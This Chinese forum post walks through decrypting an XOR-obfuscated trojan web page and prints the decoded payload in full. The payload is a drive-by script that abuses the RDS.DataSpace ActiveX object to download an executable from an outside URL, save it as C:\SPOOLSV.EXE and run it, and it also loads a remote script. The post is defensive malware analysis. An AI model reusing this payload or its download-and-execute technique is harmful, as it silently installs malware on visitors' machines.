core_md5:
    function(x, len){
     /* append padding */
     x[len >> 5] |= 0x80 << ((len) % 32);
     x[(((len + 64) >>> 9) << 4) + 14] = len;
    
     var a = 1732584193;
     var b = -271733879;
     var c = -1732584194;
     var d = 271733878;
    
     for(var i = 0; i < x.length; i += 16)
     {
     var olda = a;
     var oldb = b;
     var oldc = c;
     var oldd = d;
    
     a = this.md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
     d = this.md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
     c = this.md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
     b = this.md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
     a = this.md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
     d = this.md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
     c = this.md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
     b = this.md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
     a = this.md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
     d = this.md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
     c = this.md5_ff(c, d, a, b, x[i+10], 17, -42063);
     b = this.md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
     a = this.md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
     d = this.md5_ff(d, a, b, c, x[i+13], 12, -40341101);
     c = this.md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
     b = this.md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
    
     a = this.md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
     d = this.md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
     c = this.md5_gg(c, d, a, b, x[i+11], 14, 643717713);
     b = this.md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
     a = this.md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
     d = this.md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
     c = this.md5_gg(c, d, a, b, x[i+15], 14, -660478335);
     b = this.md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
     a = this.md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
     d = this.md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
     c = this.md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
     b = this.md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
     a = this.md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
     d = this.md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
     c = this.md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
     b = this.md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
    
     a = this.md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
     d = this.md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
     c = this.md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
     b = this.md5_hh(b, c, d, a, x[i+14], 23, -35309556);
     a = this.md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
     d = this.md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
     c = this.md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
     b = this.md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
     a = this.md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
     d = this.md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
     c = this.md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
     b = this.md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
     a = this.md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
     d = this.md5_hh(d, a, b, c, x[i+12], 11, -421815835);
     c = this.md5_hh(c, d, a, b, x[i+15], 16, 530742520);
     b = this.md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
    
     a = this.md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
     d = this.md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
     c = this.md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
     b = this.md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
     a = this.md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
     d = this.md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
     c = this.md5_ii(c, d, a, b, x[i+10], 15, -1051523);
     b = this.md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
     a = this.md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
     d = this.md5_ii(d, a, b, c, x[i+15], 10, -30611744);
     c = this.md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
     b = this.md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
     a = this.md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
     d = this.md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
     c = this.md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
     b = this.md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
    
     a = this.safe_add(a, olda);
     b = this.safe_add(b, oldb);
     c = this.safe_add(c, oldc);
     d = this.safe_add(d, oldd);
     }
     return Array(a, b, c, d);
    },
    
  hex_hmac_md5:function(key, data){ return this.binl2hex(this.core_hmac_md5(key, data)); },
  
  hex_md5:function(s){return this.binl2hex(this.core_md5(this.str2binl(s), s.length * this.chrsz));},

md5:function(s){return(this.hex_md5(s));},

  md5_cmn:function(q, a, b, x, s, t){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a, q), this.safe_add(x, t)), s),b);},

  md5_ff:function(a, b, c, d, x, s, t){return this.md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);},

  md5_gg:function(a, b, c, d, x, s, t){return this.md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);},

  md5_hh:function(a, b, c, d, x, s, t){return this.md5_cmn(b ^ c ^ d, a, b, x, s, t);},

  md5_ii:function(a, b, c, d, x, s, t){return this.md5_cmn(c ^ (b | (~d)), a, b, x, s, t);},

  md5_vm_test:function(){return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";},
  
  safe_add:
    function(x, y){
     var lsw = (x & 0xFFFF) + (y & 0xFFFF);
     var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
     return (msw << 16) | (lsw & 0xFFFF);
    },
    
  str2binl:
    function(str){
     var bin = Array();
     var mask = (1 << this.chrsz) - 1;
     for(var i = 0; i < str.length * this.chrsz; i += this.chrsz)
     bin[i>>5] |= (str.charCodeAt(i / this.chrsz) & mask) << (i%32);
     return bin;
    },

  str_hmac_md5:function(key, data){ return binl2str(core_hmac_md5(key, data)); },

  str_md5:function(s){ return binl2str(core_md5(str2binl(s), s.length * this.chrsz));}
}
function performPage(strPass){
if(strPass){
document.cookie="password="+escape(strPass);
document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}

var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";
if(pass){
pass=unescape(pass);
document.write(XOR(unescape(strHTML),STR.md5(pass)));
return(false);
}
}
performPage();
</script>
是不是比较晕啊，这么多代码，一个一个来分析下：
其中strHTML量是被加密后的代码字符串.

函数：function XOR(strV,strPass)是用来解密的，还设置了一个密码，嘿嘿，感觉挺搞笑的，js端设置密码！

主要看下最后一个函数了，我加入了一些注释：
复制内容到剪贴板代码:
function performPage(strPass){
if(strPass){
document.cookie="password="+escape(strPass);//将代码用escape加密后写入cookie中，判断是否已经执行过
document.write(XOR(unescape(strHTML),STR.md5(strPass)));//将上面的strHTML解密后执行
return(false);
}//判断strPass是否存在，存在则执行下面两语句。

var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";//密码了
if(pass){
pass=unescape(pass);//将代码用unescape函数解密，等会我们就会看到了，稍等。
document.write(XOR(unescape(strHTML),STR.md5(pass)));//将上面的strHTML用XOR函数解密后执行。
return(false);
}
}
最好就是执行函数performPage()了。

下面我们看看其源码里都是什么东西：

将vip1.htm另存为本地。

先看看其密码是什么来：

将函数performPage修改为如下，然后浏览器浏览vip1.htm：
复制内容到剪贴板代码:
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}

var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
document.write(pass);
return(false);
}
}
performPage();
</script>
浏览器显示：
引用:
密匙可以是中文，或任意字符
汗一个。下面看他木马代码怎么写的：

修改函数performPage以下部分如下：
复制内容到剪贴板代码:
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}

var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
  //document.write(pass);
  document.getElementById( "muma" ).value = XOR(unescape(strHTML),STR.md5(pass));
return(false);
}
}
//performPage();
</script>
<textarea id="muma" name="muma" rows="10" cols="50"></textarea>
<script language=javascript>performPage();</script>
浏览下vip1.htm看看，strHTML的原始代码就出来了：
复制内容到剪贴板代码:
<script src=http://cs.cskick.cn/cs/c.js></script>www.cuteqq.cn
<noscript>  
<iframe src=*></iframe>  
</noscript>
<script language="JavaScript">
<!--
document.writeln("<script>var cuteqq,cuteqq2,id,id2,id3,id4,idx,dk;cuteqq=\"http://www.kj1888.com/8.exe\";cuteqq2=\"\103\72\134\134\123\120\117\117\111\123\126\56\105\130\105\";id=\"classid\";id2=\"clsid:\";id3=\"BD96C556-65A3-11D0\";id4=\"-983A-00C04FC29E36\";idx=id2+id3+id4;dk=\"open\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(id,idx);var chilam=1;var cuteqqcn=ado.CreateObject(\"Microsoft.xmlHTTP\",\"\");var f=1;var cuteqq3=\"Ado\";var cuteqq4=\"db.St\";var cuteqq5=\"ream\";var g=1;var wwwcuteqqcn=ado.createobject(cuteqq3+cuteqq4+cuteqq5,\"\");var h=1;cuteqqcn.Open(\"GET\",cuteqq,0);cuteqqcn.Send();wwwcuteqqcn.type=1;var n=1;wwwcuteqqcn.open();wwwcuteqqcn.write(cuteqqcn.responseBody);wwwcuteqqcn.savetofile(cuteqq2,2);wwwcuteqqcn.close();var cuteqqcns=ado.createobject(\"ShelL.Application\",\"\");cuteqqcns.SHeLLeXecUte(cuteqq2,\"\",\"\",dk,0);}catch(chilam){};</script\>");
//-->
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

　　简单吧，其实客户端的加密只不过是一个纸老虎而已!

　　木马exe文件地址也出来了，剩下来的朋友们就可以拿到样本来分析了!